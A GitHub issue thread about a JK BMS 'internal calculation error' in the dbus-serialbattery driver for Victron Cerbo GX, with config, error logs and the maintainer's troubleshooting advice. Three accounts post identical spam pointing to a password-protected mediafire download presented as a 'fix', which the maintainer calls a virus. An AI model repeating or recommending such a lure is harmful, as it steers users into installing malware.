Louisvdw/dbus-serialbattery #1117: #8 Internal calculation error (JK BMS)

PeerD, 2024-08-28:
### Describe the bug

I recieved the #8 Internal calculation error two time the last day (fresh setup) with the latest driver version.

First time this occured was yesterday. I connected 1 of my 3 battery banks and after a few minutes (out of the blue) the cerbo beeped and I got this error.

Then I connected all three batteries and it run throughout the night with no problem.

Today I installed aggregate batteries, configured it and used its command to restart serialbattery. Then I got this error again (on the same bank). It runs on a newer hardware version (20230601) of JK than the other two banks (20220701).

The battery now shows state error (not sure how to reset) but otherwise seems to work fine.

### How to reproduce

First time: I installed serialbattery on a fresh cerbo gx. Connected 1 battery and after like 10 minutes this error came.

Second time: after installing and configuring aggregate battery and restarting serial battery with their script, banks 2 and 3 were found immediately. Bank 1 took like 30 seconds longer and then when found, threw this error after a few seconds.

### Expected behavior

No errors or the ability to clear the error

### Driver version

1.3.20240705

### Venus OS device type

Cerbo GX

### Venus OS version

v3.41

### BMS type

JKBMS / Heltec BMS

### Cell count

16

### Battery count

3

### Connection type

Serial USB adapter to TTL

### Config file

```ini
[DEFAULT]

; If you want to add custom values/settings, then check the values/settings you want to change in "config.default.ini"
; and insert them below to persist future driver updates.

; --------- Battery Current limits ---------
MAX_BATTERY_CHARGE_CURRENT    = 50.0
MAX_BATTERY_DISCHARGE_CURRENT = 100.0

; --------- Cell Voltages ---------
; Description:
;     Cell min/max voltages which are used for:
;         - Calculating the min/max battery voltage
;         - Trigger the SoC reset when SoC calculation is enabled
; Example:
;     16 cells * 3.45 V/cell = 55.2 V max charge voltage.
;     16 cells * 2.90 V/cell = 46.4 V min discharge voltage
[... 277 lines cut ...]
2024-08-28 07:15:59.121549500 INFO:SerialBattery:> Connection voltage: 52.7 V | Current: -0.0 A | SoC: 53%
2024-08-28 07:15:59.122523500 INFO:SerialBattery:> Cell count: 16 | Cells populated: 16
2024-08-28 07:15:59.123473500 INFO:SerialBattery:> LINEAR LIMITATION ENABLE: True
2024-08-28 07:15:59.124791500 INFO:SerialBattery:> MIN CELL VOLTAGE: 3.000 V | MAX CELL VOLTAGE: 3.550 V| FLOAT CELL VOLTAGE: 3.300 V
2024-08-28 07:15:59.125834500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 50.0 A | MAX BATTERY DISCHARGE CURRENT: 100.0 A
2024-08-28 07:15:59.126944500 INFO:SerialBattery:> MAX BATTERY CHARGE CURRENT: 100.0 A | MAX BATTERY DISCHARGE CURRENT: 150.0 A (read from BMS)
2024-08-28 07:15:59.127927500 INFO:SerialBattery:> CVCM:     True
2024-08-28 07:15:59.128966500 INFO:SerialBattery:> CCCM CV:  True  | DCCM CV:  True
2024-08-28 07:15:59.129978500 INFO:SerialBattery:> CCCM T:   True  | DCCM T:   True
2024-08-28 07:15:59.131060500 INFO:SerialBattery:> CCCM SOC: False | DCCM SOC: False
2024-08-28 07:15:59.132259500 INFO:SerialBattery:> CHARGE FET: True | DISCHARGE FET: True | BALANCE FET: True
2024-08-28 07:15:59.133286500 INFO:SerialBattery:Serial Number/Unique Identifier: Bank3_Safira_B1
2024-08-28 07:16:00.170870500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x50d1, Got 0x502c
2024-08-28 07:16:00.174800500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/battery.py line #490
2024-08-28 07:16:00.185295500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 07:16:00.187553500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 07:16:00.434335500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1061
2024-08-28 07:16:01.167832500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x50d4, Got 0x502f
2024-08-28 07:16:01.170106500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/battery.py line #490
2024-08-28 07:16:01.175677500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 07:16:01.185755500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 07:16:01.191485500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1061
2024-08-28 07:16:13.229357500 ERROR:SerialBattery:CRC checksum mismatch: Expected 0x50d1, Got 0x502c
2024-08-28 07:16:44.257267500 ERROR:SerialBattery:>>> ERROR: No reply - returning [len:11/57576]
```

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

PeerD, 2024-08-28:
I assume those two are spam bots?

NEKO-JOJUK, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

mr-manuel, 2024-08-28:
Yes, it's spam and a virus. They are all over GitHub right now. DO NOT OPEN THE ATTACHMENT

mr-manuel, 2024-08-28:
It seems, that you don't have a stable wired connection. Is the serial cable shielded?

Anyway, unfortunately you did not read carefully the instructions when opening an issue, but at least you provided the correct logs :-)

Here again:

## 🚨 IMPORTANT 🚨

* Please carefully read all the instructions below including the descriptions! Very often we have to request the data again, because it was not provided in the first place.

* Please try the `nightly` build first, if you are not already using it. It's very likely that the bug is already fixed. See [here](https://louisvdw.github.io/dbus-serialbattery/general/install#nightly-build) how to install it.

PeerD, 2024-08-28:
Oh, I'm terriby sorry. I missed that one. I have installed it now and the error is gone :)

But now I have ever device twice. The name of the battery is still the custom one I gave but it shows them twice now:
[image]

mr-manuel, 2024-08-28:
If you reboot or go to the bottom of the list, you can remove the `Not Connected` devices. This is because with the latest driver the dbus service name of the driver changed. Nothing to worry about.

closed 2024-08-28 by mr-manuel

PeerD, 2024-08-28:
I, it seems I was too quick. Now suddenly all three battery banks threw this error at the same time:

`2024-08-28 08:23:07.724733500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:07.724850500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:07.724858500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1142
2024-08-28 08:23:08.720964500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/battery.py line #628
2024-08-28 08:23:08.721961500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:08.723311500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:08.727952500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1142
2024-08-28 08:23:09.721759500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/battery.py line #628
2024-08-28 08:23:09.722746500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:09.724244500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:09.728665500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1142
2024-08-28 08:23:10.719404500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/battery.py line #628
2024-08-28 08:23:10.720398500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:10.721723500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:10.726459500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1142
2024-08-28 08:23:11.808814500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/battery.py line #628
2024-08-28 08:23:11.810046500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:11.811561500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:11.820397500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1142
2024-08-28 08:23:12.789732500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/battery.py line #628
2024-08-28 08:23:12.790679500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:12.792100500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:12.797615500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery [... cut ...]
2024-08-28 08:23:16.727936500 WARNING:SerialBattery:calcMaxChargeCurrentReferringToCellVoltage(): get_max_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:16.729397500 WARNING:SerialBattery:calcMaxDischargeCurrentReferringToCellVoltage(): get_min_cell_voltage() is None, using default current instead. If you don't see this warning very often, you can ignore it.
2024-08-28 08:23:16.764228500 ERROR:SerialBattery:Non blocking exception occurred: TypeError("unsupported operand type(s) for -: 'NoneType' and 'NoneType'") of type <class 'TypeError'> in /opt/victronenergy/dbus-serialbattery/dbushelper.py line #1142`

PeerD, 2024-08-28:
Aggregate Batteries was not able to run (it seems it was supplied NoneType Values.

```
ERROR:root:Wed Aug 28 08:29:11 2024: Error: '>' not supported between instances of 'NoneType' and 'NoneType'.
ERROR:root:Occured during step Find max. and min. cell voltage of all batteries, Battery Bank 1.
```

I did a restart for good measure and now it seems to run and aggregate batteries is also running again normally.

The strange thing is that all three banks threw the error this time at the same time. If it would be a bad serial connection on bank 1, this should not affect bank 2 or 3 that have not thrown any errors until now?

mr-manuel, 2024-08-28:
It should not be connected, except you are using a USB hub.

PeerD, 2024-08-28:
Yes, I am using a hub as the cerbo only has two usb ports. Is it possible to connect multiple JK via a single serial adapter? I thought each bms needed its own adapter.

Anyways, now it seems to run fine.

Thank you very much for your support and this great project!

mr-manuel, 2024-08-28:
In your case you need one UART/TTL port per BMS. The [DuPPa.net Isolated 4 port USB to TTL UART FTDI](https://www.duppa.net/shop/isolated-4-port-usb-to-ttl-uart-ftdi/) is very stable.